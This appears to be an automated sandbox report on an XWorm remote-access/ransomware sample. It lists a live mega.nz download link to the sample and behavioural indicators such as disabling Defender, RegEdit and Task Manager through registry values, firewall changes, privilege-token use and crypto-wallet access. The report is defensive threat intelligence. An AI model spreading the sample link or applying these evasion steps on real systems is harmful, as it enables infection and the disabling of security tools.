Malware Analysis Report

2024-11-16 13:40

Sample ID 240601-z4sfdsfb7v
Target https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY
Tags
xworm evasion execution ransomware rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY was found to be: Known bad.

Malicious Activity Summary

xworm evasion execution ransomware rat spyware trojan

Detect Xworm Payload

Xworm

Contains code to disable Windows Defender

Modifies Windows Firewall

Disables Task Manager via registry modification

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Disables RegEdit via registry modification

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops desktop.ini file(s)

Sets desktop wallpaper using registry

Launches sc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

NTFS ADS

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 21:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 21:16

Reported

2024-06-01 21:21

Platform

win11-20240426-en

Max time kernel

251s

Max time network

300s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\netsh.exe N/A

Stops running service(s)

evasion execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2994005945-4089876968-1367784197-1000\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 72931.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\KLLauncher.bat:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\SC.cmd\:SmartScreen:$DATA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\SC.cmd\:Zone.Identifier:$DATA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4152 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 1500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 1500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
